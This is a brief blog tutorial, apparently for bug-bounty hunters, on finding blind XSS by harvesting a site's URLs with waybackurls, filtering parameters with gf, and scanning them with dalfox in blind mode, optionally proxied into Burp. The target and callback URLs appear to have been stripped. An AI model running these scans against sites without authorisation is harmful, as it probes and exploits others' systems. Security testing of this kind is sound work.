How To Find Blind Xss using dalfox | (dalfox #2)

Hello all

I am back with another blog on xss let’s talk about blind xss and how we can found it using dalfox tool i have already created a blog on dalfox so go and checkout :

So let’s start:

We need a url to test blind xss so let’s take this :

So let’s find some url of this site so type a command in your terminal : waybackurls | tee testurl.txt

Now just hit <ENTER> it will found some urls

So we have a file which is testurl.txt so let’s find some parameters to find to test xss for that use GF tool which is on github :

And command is : cat testurl.txt | gf xss >> testxss.txt

hit <ENTER> it will gives you some parameter to test xss

So Now this to fire dalfox.

Just type a command : dalfox file
testxss.txt pipe -b -F

Hit <ENTER> and see the response

If you want to send this request to your burpsuite for manual testing so use this payload :

dalfox file testxss.txt pipe -b -F –proxy


Go Your burpsuite check http history and see all request are there you can test them manual
Thanks For Reading

Leave a Reply